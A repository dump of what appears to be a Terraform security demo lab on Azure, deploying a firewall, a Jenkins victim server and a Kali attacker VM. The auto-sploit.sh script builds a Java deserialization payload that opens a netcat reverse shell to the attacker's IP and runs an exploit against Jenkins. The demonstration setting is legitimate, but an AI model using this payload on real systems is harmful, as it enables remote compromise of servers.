 5 |   name                     = "bootstrap${lower(random_id.storage_account.hex)}"
 6 |   resource_group_name      = "${azurerm_resource_group.resourcegroup.name}"
 7 |   location                 = "${azurerm_resource_group.resourcegroup.location}"
 8 |   account_tier             = "Standard"
 9 |   account_replication_type = "LRS"
10 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInBootstrap/outputs.tf:
--------------------------------------------------------------------------------
1 | output "Resource_Group" {
2 |   value = "${azurerm_resource_group.resourcegroup.name}"
3 | }
4 | output "Storage_Account_Access_Key" {
5 |   value = "${azurerm_storage_account.bootstrap.primary_access_key}"
6 | }
7 | output "Bootstrap_Bucket" {
8 |   value="bootstrap${lower(random_id.storage_account.hex)}"
9 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInBootstrap/resourcegroup.tf:
--------------------------------------------------------------------------------
 1 | # Configure the Microsoft Azure Provider
 2 | provider "azurerm" {}
 3 | 
 4 | resource "random_id" "resource_group" {
 5 |   byte_length = 2
 6 | }
 7 | 
 8 | # ********** RESOURCE GROUP **********
 9 | 
10 | # Create a resource group
11 | resource "azurerm_resource_group" "resourcegroup" {
12 | 	name		= "${var.RG_Name}-${lower(random_id.resource_group.hex)}"
13 | 	location	= "${var.Azure_Region}"
14 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars:
--------------------------------------------------------------------------------
1 | RG_Name = "<Jenkins RG Name>"
2 | 
3 | Azure_Region = "<Azure Region>"
4 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/azure_vars.tf:
--------------------------------------------------------------------------------
 1 | variable "RG_Name" {}
 2 | variable "Attack_RG_Name" {}
 3 | variable "Azure_Region" {}
 4 | variable "Admin_Username" {}
 5 | variable "Admin_Password" {}
 6 | variable "Bootstrap_Storage_Account" {}
 7 | variable "Storage_Account_Access_Key" {}
 8 | variable "Storage_Account_Fileshare" {}
 9 | variable "Storage_Account_Fileshare_Directory" {}
10 | variable "Web_Initscript_Path" {}
11 | variable "Attack_Initscript_Path" {}
12 | variable "Victim_CIDR" {}
13 | variable "Attack_CIDR" {}
14 | variable "Mgmt_Subnet_CIDR" {}
15 | variable "Untrust_Subnet_CIDR" {}
16 | variable "Trust_Subnet_CIDR" {}
17 | variable "AppGW_Subnet_CIDR" {}
18 | variable "Web_Subnet_CIDR" {}
19 | variable "Attack_Subnet_CIDR" {}
20 | variable "FW_Mgmt_IP" {}
21 | variable "FW_Untrust_IP" {}
22 | variable "FW_Trust_IP" {}
23 | variable "WebLB_IP" {}
24 | variable "Web_IP" {}
25 | variable "Attack_IP" {}


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/bootstrap.tf:
--------------------------------------------------------------------------------
 1 | resource "random_id" "storage_account" {
 2 |   byte_length = 8
 3 | }
 4 | 
 5 | resource "azurerm_storage_account" "jenkins" {
 6 |   name                     = "${lower(random_id.storage_account.hex)}"
 7 |   resource_group_name      = "${azurerm_resource_group.resourcegroup.name}"
 8 |   location                 = "${azurerm_resource_group.resourcegroup.location}"
 9 |   account_tier             = "Standard"
10 |   account_replication_type = "LRS"
11 | }
12 | 
13 | resource "azurerm_storage_share" "bootstrap" {
14 |   name = "bootstrap"
15 |   resource_group_name  = "${azurerm_resource_group.resourcegroup.name}"
16 |   storage_account_name = "${azurerm_storage_account.jenkins.name}"
17 |   quota = 1
18 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
1 | dns-primary=8.8.8.8
2 | dns-secondary=8.8.4.4


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/kali-interfaces.tf:
--------------------------------------------------------------------------------
 1 | #### CREATE THE NETWORK INTERFACES ####
 2 | 
 3 | resource "azurerm_network_interface" "attacker" {
 4 | 	name								= "attacker"
 5 | 	location							= "${azurerm_resource_group.attackgroup.location}"
 6 | 	resource_group_name 				= "${azurerm_resource_group.attackgroup.name}"
 7 | 	ip_configuration {
 8 | 		name							= "eth0"
 9 | 		subnet_id						= "${azurerm_subnet.attacker.id}"
10 | 		private_ip_address_allocation 	= "Static"
11 |     private_ip_address = "${var.Attack_IP}"
12 | 		public_ip_address_id = "${azurerm_public_ip.attacker.id}"
13 | 	}
14 | 	depends_on = ["azurerm_public_ip.attacker"]
15 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/kali-public-ips.tf:
--------------------------------------------------------------------------------
1 | #### CREATE PUBLIC IP ADDRESSES ####
2 | 
3 | resource "azurerm_public_ip" attacker {
4 | 	name                = "attacker"
5 | 	location			      = "${azurerm_resource_group.attackgroup.location}"
6 | 	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
7 | 	allocation_method   = "Static"
8 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/kali-rg-subnets.tf:
--------------------------------------------------------------------------------
 1 | # ********** RESOURCE GROUP **********
 2 | 
 3 | # Create a resource group
 4 | resource "random_id" "attack_resource_group" {
 5 |   byte_length = 2
 6 | }
 7 | resource "azurerm_resource_group" "attackgroup" {
 8 | 	name		= "${var.Attack_RG_Name}-${lower(random_id.attack_resource_group.hex)}"
 9 | 	location	= "${var.Azure_Region}"
10 | }
11 | 
12 | # ********** VNET **********
13 | 
14 | # Create a virtual network in the resource group
15 | resource "azurerm_virtual_network" "attack-vnet" {
16 | 	name				= "attack-vnet"
17 | 	address_space		= ["${var.Attack_CIDR}"]
18 | 	location			= "${azurerm_resource_group.attackgroup.location}"
19 | 	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
20 | }
21 | 
22 | #### CREATE THE SUBNETS ####
23 | 
24 | resource "azurerm_subnet" "attacker" {
25 |   name                 = "attacker"
26 |   resource_group_name  = "${azurerm_resource_group.attackgroup.name}"
27 |   virtual_network_name = "${azurerm_virtual_network.attack-vnet.name}"
28 |   address_prefix       = "${var.Attack_Subnet_CIDR}"
29 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/kali-route-tables.tf:
--------------------------------------------------------------------------------
 1 | #### CREATE THE ROUTE TABLES ####
 2 | 
 3 | resource "azurerm_route_table" "attacker" {
 4 |   name                = "attacker"
 5 | 	location			      = "${azurerm_resource_group.attackgroup.location}"
 6 | 	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
 7 |   route {
 8 |     name           = "internet"
 9 |     address_prefix = "0.0.0.0/0"
10 |     next_hop_type  = "internet"
11 |   }
12 | }
13 | resource "azurerm_subnet_route_table_association" "attacker" {
14 |   subnet_id      = "${azurerm_subnet.attacker.id}"
15 |   route_table_id = "${azurerm_route_table.attacker.id}"
16 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/outputs.bak:
--------------------------------------------------------------------------------
 1 | output "MGT-IP-FW-1" {
 2 |   value = "${azurerm_public_ip.fwmanagement.ip_address}"
 3 | }
 4 | 
 5 | output "NLB-DNS" {
 6 |   value = "${aws_lb.int-nlb.dns_name}"
 7 | }
 8 | 
 9 | output "ALB-DNS" {
10 |   value = "${aws_lb.panos-alb.dns_name}"
11 | }
12 | 
13 | output "NATIVE-DNS" {
14 |   value = "${aws_lb.native-alb.dns_name}"
15 | }
16 | 
17 | output "ATTACKER_IP" {
18 |   value = "${azurerm_public_ip.attacker.ip_address}"
19 | }
20 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "MGT-IP-FW-1" {
 2 |   value = "${azurerm_public_ip.fwmanagement.ip_address}"
 3 | }
 4 | 
 5 | output "NLB-DNS" {
 6 |   value = "${var.WebLB_IP}"
 7 | }
 8 | 
 9 | output "ALB-DNS" {
10 |   value = "${azurerm_public_ip.appgw2.fqdn}"
11 | }
12 | 
13 | output "NATIVE-DNS" {
14 |   value = "${azurerm_public_ip.appgw1.fqdn}"
15 | }
16 | 
17 | output "ATTACKER_IP" {
18 |   value = "${azurerm_public_ip.attacker.ip_address}"
19 | }
20 | 
21 | output "RG_Name" {
22 |   value = "${data.azurerm_resource_group.resourcegroup.name}"
23 | }
24 | 
25 | output "Attacker_RG_Name" {
26 |   value = "${azurerm_resource_group.attackgroup.name}"
27 | }
28 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  attacker:" >> docker-compose.yml
10 | echo "    image: pglynn/kali:latest" >> docker-compose.yml
11 | echo "    ports:" >> docker-compose.yml
12 | echo "      - \"443:443\"" >> docker-compose.yml
13 | echo "      - \"5000:5000\"" >> docker-compose.yml
14 | docker-compose up -d


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/Dockerfile
 8 | wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/docker-compose.yml
 9 | wget https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/attacker/run.sh
10 | wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/auto-sploit.sh
11 | wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/exp-server.py
12 | docker-compose build
13 | docker-compose up -d
14 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  jenkins:" >> docker-compose.yml
10 | echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
11 | echo "    environment:" >> docker-compose.yml
12 | echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
13 | echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
14 | echo "    ports:" >> docker-compose.yml
15 | echo "      - \"50000:50000\"" >> docker-compose.yml
16 | echo "      - \"8080:8080\"" >> docker-compose.yml
17 | docker-compose up -d
18 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile
 8 | wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml
 9 | wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh
10 | docker-compose build
11 | docker-compose up -d
12 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInFWConf/azure_vars.tf:
--------------------------------------------------------------------------------
 1 | 
 2 | variable "FW_Mgmt_IP" {}
 3 | variable "FW_Untrust_IP" {}
 4 | variable "Web_IP" {}
 5 | variable "LB_IP" {}
 6 | variable "Admin_Username" {}
 7 | variable "Admin_Password" {}
 8 | variable "FW_Default_GW" {}
 9 | variable "FW_Internal_GW" {}
10 | variable "Web_Subnet_CIDR" {}


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInFWConf/terraform.tfvars:
--------------------------------------------------------------------------------
 1 | Admin_Username = "<Admin Username>"
 2 | 
 3 | Admin_Password = "<Admin Password>"
 4 | 
 5 | FW_Untrust_IP = "10.0.1.10"
 6 | 
 7 | LB_IP = "10.0.4.10"
 8 | 
 9 | Web_IP = "10.0.4.50"
10 | 
11 | FW_Default_GW = "10.0.1.1"
12 | 
13 | Web_Subnet_CIDR = "10.0.4.0/24"
14 | 
15 | FW_Internal_GW = "10.0.2.1"


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/attacker/auto-sploit.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash 
 2 | 
 3 | echo
 4 | echo "*******************************************************************"
 5 | echo
 6 | echo "Open another terminal window and run a netcat listener: nc -lvp 443"
 7 | echo
 8 | echo "Run the following command  to spawn a shell once the reverse connection establishes:"
 9 | echo 
10 | echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'" 
11 | echo
12 | read -n 1 -s -r -p "Once the above is complete - press any key to continue"
13 | 
14 | echo
15 | echo "Enter Attacker IP Address:"
16 | echo
17 | 
18 | read attacker
19 | 
20 | echo "Creating Payload with IP address" $attacker
21 | echo
22 | 
23 | java -jar payload.jar payload.ser "nc -e /bin/bash $attacker 443" 
24 | 
25 | echo "Payload successfully created and saved as 'payload.ser'"
26 | echo 
27 | 
28 | echo "Executing exploit..."
29 | echo
30 | 
31 | python3 exploit.py
32 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/attacker/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 |   attacker:
4 |     build: .
5 |     container_name: attacker
6 |     ports:
7 |       - "443:443"
8 |       - "5000:5000"
9 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/attacker/run.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash -e
 2 | 
 3 | # Running nc on an unexposed port to keep the container up
 4 | 
 5 | if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
 6 | 
 7 |   exec nc -l -p 56789 "$@"
 8 | 
 9 | fi
10 | 
11 | exec "$@"
12 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/azure_login.py:
--------------------------------------------------------------------------------
 1 | from azure import cli
 2 | from azure.cli.core import get_default_cli
 3 | import sys
 4 | 
 5 | sys.sterr = sys.stdout
 6 | 
 7 | print('Logging in to Azure using device code')
 8 | 
 9 | get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
10 | pass


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/jenkins/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3'
 2 | services:
 3 |   jenkins:
 4 |     build: .
 5 |     container_name: jenkins
 6 |     environment:
 7 |       JAVA_OPTS: "-Djava.awt.headless=true"
 8 |       JAVA_OPTS: "-Djenkins.install.runSetupWizard=false"
 9 |     ports:
10 |       - "50000:50000"
11 |       - "8080:8080"
12 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/jenkins/jenkins.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash -e
 2 | 
 3 | : "${JENKINS_HOME:="/var/jenkins_home"}"
 4 | touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. Wrong volume permissions?"; exit 1; }
 5 | echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG"
 6 | 
 7 | # if `docker run` first argument start with `--` the user is passing jenkins launcher arguments
 8 | if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
 9 | 
10 |   # read JAVA_OPTS and JENKINS_OPTS into arrays
11 |   java_opts_array=()
12 |   while IFS= read -r -d '' item; do
13 |     java_opts_array+=( "$item" )
14 |   done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS")
15 | 
16 |   jenkins_opts_array=( )
17 |   while IFS= read -r -d '' item; do
18 |     jenkins_opts_array+=( "$item" )
19 |   done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS")
20 | 
21 |   exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@"
22 | fi
23 | 
24 | exec "$@"
25 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/jenkins/tini:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-master/jenkins/tini


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/payload/payload.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-master/payload/payload.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInBootstrap/azure_vars.tf:
--------------------------------------------------------------------------------
1 | variable "RG_Name" {}
2 | variable "Azure_Region" {}
3 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInBootstrap/bootstrap.tf:
--------------------------------------------------------------------------------
 1 | resource "random_id" "storage_account" {
 2 |   byte_length = 2
 3 | }
 4 | resource "azurerm_storage_account" "bootstrap" {
 5 |   name                     = "bootstrap${lower(random_id.storage_account.hex)}"
 6 |   resource_group_name      = "${azurerm_resource_group.resourcegroup.name}"
 7 |   location                 = "${azurerm_resource_group.resourcegroup.location}"
 8 |   account_tier             = "Standard"
 9 |   account_replication_type = "LRS"
10 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInBootstrap/outputs.tf:
--------------------------------------------------------------------------------
1 | output "Resource_Group" {
2 |   value = "${azurerm_resource_group.resourcegroup.name}"
3 | }
4 | output "Storage_Account_Access_Key" {
5 |   value = "${azurerm_storage_account.bootstrap.primary_access_key}"
6 | }
7 | output "Bootstrap_Bucket" {
8 |   value="bootstrap${lower(random_id.storage_account.hex)}"
9 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInBootstrap/resourcegroup.tf:
--------------------------------------------------------------------------------
 1 | # Configure the Microsoft Azure Provider
 2 | provider "azurerm" {}
 3 | 
 4 | resource "random_id" "resource_group" {
 5 |   byte_length = 2
 6 | }
 7 | 
 8 | # ********** RESOURCE GROUP **********
 9 | 
10 | # Create a resource group
11 | resource "azurerm_resource_group" "resourcegroup" {
12 | 	name		= "${var.RG_Name}-${lower(random_id.resource_group.hex)}"
13 | 	location	= "${var.Azure_Region}"
14 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInBootstrap/terraform.tfvars:
--------------------------------------------------------------------------------
1 | RG_Name = "<Jenkins RG Name>"
2 | 
3 | Azure_Region = "<Azure Region>"
4 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/azure_vars.tf:
--------------------------------------------------------------------------------
 1 | variable "RG_Name" {}
 2 | variable "Attack_RG_Name" {}
 3 | variable "Azure_Region" {}
 4 | variable "Admin_Username" {}
 5 | variable "Admin_Password" {}
 6 | variable "Bootstrap_Storage_Account" {}
 7 | variable "Storage_Account_Access_Key" {}
 8 | variable "Storage_Account_Fileshare" {}
 9 | variable "Storage_Account_Fileshare_Directory" {}
10 | variable "Web_Initscript_Path" {}
11 | variable "Attack_Initscript_Path" {}
12 | variable "Victim_CIDR" {}
13 | variable "Attack_CIDR" {}
14 | variable "Mgmt_Subnet_CIDR" {}
15 | variable "Untrust_Subnet_CIDR" {}
16 | variable "Trust_Subnet_CIDR" {}
17 | variable "AppGW_Subnet_CIDR" {}
18 | variable "Web_Subnet_CIDR" {}
19 | variable "Attack_Subnet_CIDR" {}
20 | variable "FW_Mgmt_IP" {}
21 | variable "FW_Untrust_IP" {}
22 | variable "FW_Trust_IP" {}
23 | variable "WebLB_IP" {}
24 | variable "Web_IP" {}
25 | variable "Attack_IP" {}


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/bootstrap.tf:
--------------------------------------------------------------------------------
 1 | resource "random_id" "storage_account" {
 2 |   byte_length = 8
 3 | }
 4 | 
 5 | resource "azurerm_storage_account" "jenkins" {
 6 |   name                     = "${lower(random_id.storage_account.hex)}"
 7 |   resource_group_name      = "${azurerm_resource_group.resourcegroup.name}"
 8 |   location                 = "${azurerm_resource_group.resourcegroup.location}"
 9 |   account_tier             = "Standard"
10 |   account_replication_type = "LRS"
11 | }
12 | 
13 | resource "azurerm_storage_share" "bootstrap" {
14 |   name = "bootstrap"
15 |   resource_group_name  = "${azurerm_resource_group.resourcegroup.name}"
16 |   storage_account_name = "${azurerm_storage_account.jenkins.name}"
17 |   quota = 1
18 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
1 | dns-primary=8.8.8.8
2 | dns-secondary=8.8.4.4


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/kali-interfaces.tf:
--------------------------------------------------------------------------------
 1 | #### CREATE THE NETWORK INTERFACES ####
 2 | 
 3 | resource "azurerm_network_interface" "attacker" {
 4 | 	name								= "attacker"
 5 | 	location							= "${azurerm_resource_group.attackgroup.location}"
 6 | 	resource_group_name 				= "${azurerm_resource_group.attackgroup.name}"
 7 | 	ip_configuration {
 8 | 		name							= "eth0"
 9 | 		subnet_id						= "${azurerm_subnet.attacker.id}"
10 | 		private_ip_address_allocation 	= "Static"
11 |     private_ip_address = "${var.Attack_IP}"
12 | 		public_ip_address_id = "${azurerm_public_ip.attacker.id}"
13 | 	}
14 | 	depends_on = ["azurerm_public_ip.attacker"]
15 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/kali-public-ips.tf:
--------------------------------------------------------------------------------
1 | #### CREATE PUBLIC IP ADDRESSES ####
2 | 
3 | resource "azurerm_public_ip" attacker {
4 | 	name                = "attacker"
5 | 	location			      = "${azurerm_resource_group.attackgroup.location}"
6 | 	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
7 | 	allocation_method   = "Static"
8 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/kali-rg-subnets.tf:
--------------------------------------------------------------------------------
 1 | # ********** RESOURCE GROUP **********
 2 | 
 3 | # Create a resource group
 4 | resource "random_id" "attack_resource_group" {
 5 |   byte_length = 2
 6 | }
 7 | resource "azurerm_resource_group" "attackgroup" {
 8 | 	name		= "${var.Attack_RG_Name}-${lower(random_id.attack_resource_group.hex)}"
 9 | 	location	= "${var.Azure_Region}"
10 | }
11 | 
12 | # ********** VNET **********
13 | 
14 | # Create a virtual network in the resource group
15 | resource "azurerm_virtual_network" "attack-vnet" {
16 | 	name				= "attack-vnet"
17 | 	address_space		= ["${var.Attack_CIDR}"]
18 | 	location			= "${azurerm_resource_group.attackgroup.location}"
19 | 	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
20 | }
21 | 
22 | #### CREATE THE SUBNETS ####
23 | 
24 | resource "azurerm_subnet" "attacker" {
25 |   name                 = "attacker"
26 |   resource_group_name  = "${azurerm_resource_group.attackgroup.name}"
27 |   virtual_network_name = "${azurerm_virtual_network.attack-vnet.name}"
28 |   address_prefix       = "${var.Attack_Subnet_CIDR}"
29 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/kali-route-tables.tf:
--------------------------------------------------------------------------------
 1 | #### CREATE THE ROUTE TABLES ####
 2 | 
 3 | resource "azurerm_route_table" "attacker" {
 4 |   name                = "attacker"
 5 | 	location			      = "${azurerm_resource_group.attackgroup.location}"
 6 | 	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
 7 |   route {
 8 |     name           = "internet"
 9 |     address_prefix = "0.0.0.0/0"
10 |     next_hop_type  = "internet"
11 |   }
12 | }
13 | resource "azurerm_subnet_route_table_association" "attacker" {
14 |   subnet_id      = "${azurerm_subnet.attacker.id}"
15 |   route_table_id = "${azurerm_route_table.attacker.id}"
16 | }


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/outputs.bak:
--------------------------------------------------------------------------------
 1 | output "MGT-IP-FW-1" {
 2 |   value = "${azurerm_public_ip.fwmanagement.ip_address}"
 3 | }
 4 | 
 5 | output "NLB-DNS" {
 6 |   value = "${aws_lb.int-nlb.dns_name}"
 7 | }
 8 | 
 9 | output "ALB-DNS" {
10 |   value = "${aws_lb.panos-alb.dns_name}"
11 | }
12 | 
13 | output "NATIVE-DNS" {
14 |   value = "${aws_lb.native-alb.dns_name}"
15 | }
16 | 
17 | output "ATTACKER_IP" {
18 |   value = "${azurerm_public_ip.attacker.ip_address}"
19 | }
20 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "MGT-IP-FW-1" {
 2 |   value = "${azurerm_public_ip.fwmanagement.ip_address}"
 3 | }
 4 | 
 5 | output "NLB-DNS" {
 6 |   value = "${var.WebLB_IP}"
 7 | }
 8 | 
 9 | output "ALB-DNS" {
10 |   value = "${azurerm_public_ip.appgw2.fqdn}"
11 | }
12 | 
13 | output "NATIVE-DNS" {
14 |   value = "${azurerm_public_ip.appgw1.fqdn}"
15 | }
16 | 
17 | output "ATTACKER_IP" {
18 |   value = "${azurerm_public_ip.attacker.ip_address}"
19 | }
20 | 
21 | output "RG_Name" {
22 |   value = "${data.azurerm_resource_group.resourcegroup.name}"
23 | }
24 | 
25 | output "Attacker_RG_Name" {
26 |   value = "${azurerm_resource_group.attackgroup.name}"
27 | }
28 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  attacker:" >> docker-compose.yml
10 | echo "    image: pglynn/kali:latest" >> docker-compose.yml
11 | echo "    ports:" >> docker-compose.yml
12 | echo "      - \"443:443\"" >> docker-compose.yml
13 | echo "      - \"5000:5000\"" >> docker-compose.yml
14 | docker-compose up -d


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker1.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/Dockerfile
 8 | wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/docker-compose.yml
 9 | wget https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/attacker/run.sh
10 | wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/auto-sploit.sh
11 | wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/exp-server.py
12 | docker-compose build
13 | docker-compose up -d
14 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  jenkins:" >> docker-compose.yml
10 | echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
11 | echo "    environment:" >> docker-compose.yml
